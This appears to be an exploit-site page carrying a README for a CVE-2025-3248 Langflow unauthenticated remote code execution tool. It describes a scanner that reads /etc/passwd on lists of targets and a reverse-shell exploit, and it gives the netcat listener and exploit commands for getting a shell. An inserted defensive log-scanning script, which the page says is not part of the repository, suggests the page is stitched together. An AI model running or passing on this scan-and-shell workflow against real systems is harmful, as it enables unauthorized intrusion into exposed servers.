## https://sploitus.com/exploit?id=7BFED669-FAC0-5596-915A-7E14C6C03D6C
# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)
This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.
## Summary
**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.
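
A defender-side check for the endpoint named above, as an added example that is not part of this repository: it scans web access logs for requests to `/api/v1/validate/code` and groups them by client. It assumes Combined Log Format from a reverse proxy in front of Langflow; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Endpoint named in the summary above.
ENDPOINT = "/api/v1/validate/code"

# Combined Log Format (assumption: a reverse proxy such as nginx fronts Langflow).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def normalize_path(target):
    """Drop query/fragment, percent-decode, collapse repeated and trailing slashes."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    path = re.sub(r"/{2,}", "/", path)
    return path.rstrip("/") or "/"

def find_hits(lines):
    """Return {client_ip: [(timestamp, method, status), ...]} for requests to ENDPOINT."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m and normalize_path(m["target"]) == ENDPOINT:
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

def answered(hits):
    """Clients that received at least one 2xx from the endpoint (heuristic: review first)."""
    return sorted(ip for ip, reqs in hits.items()
                  if any(200 <= status < 300 for _, _, status in reqs))

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2025:10:01:02 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [12/May/2025:10:01:05 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 200 498 "-" "python-requests/2.31.0"',
    '198.51.100.23 - - [12/May/2025:10:04:40 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 401 61 "-" "curl/8.5.0"',
    '192.0.2.10 - - [12/May/2025:10:05:00 +0000] "GET /api/v1/flows/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = find_hits(SAMPLE_LOG)
    for ip, reqs in found.items():
        print(ip, len(reqs), "request(s):", reqs)
    print("answered with 2xx:", answered(found))
```

Run it over the proxy's real access log by passing an open file to `find_hits`; any client listed by `answered` reached the endpoint and got a successful response, so that host's Langflow version and exposure should be checked first.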
---
## Files
### `LangflowCheck.py`
- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.
### `exploit.py`
- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.
---
## Usage
### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL:
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
```

Multiple targets:
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```

### 3. Exploit a Target
First, start a listener:
```bash
sudo nc -nvlp 4444
```

Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```

You should receive a shell if the target is vulnerable.

## ⚠️ Disclaimer
This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.